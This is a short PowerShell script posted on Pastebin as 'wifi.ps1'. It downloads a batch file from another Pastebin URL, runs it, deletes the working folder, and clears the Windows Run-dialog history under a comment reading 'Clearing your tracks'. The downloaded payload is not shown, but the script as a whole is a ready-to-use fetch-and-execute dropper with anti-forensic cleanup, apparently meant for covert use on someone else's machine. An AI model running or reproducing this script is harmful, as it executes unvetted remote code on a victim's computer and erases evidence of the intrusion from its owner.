Advertisement
mymoishy

wifi.ps1

Jun 23rd, 2019
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. cd /;mkdir files;cd files;
  2. wget https://pastebin.com/raw/3t6uRcmR -OutFile wifi.bat
  3. start wifi.bat
  4. Remove-Item –path "c:\files" –recurse
  5. // --> Clearing your tracks
  6.  
  7.  
  8. Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
  9.  
  10.  
  11. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement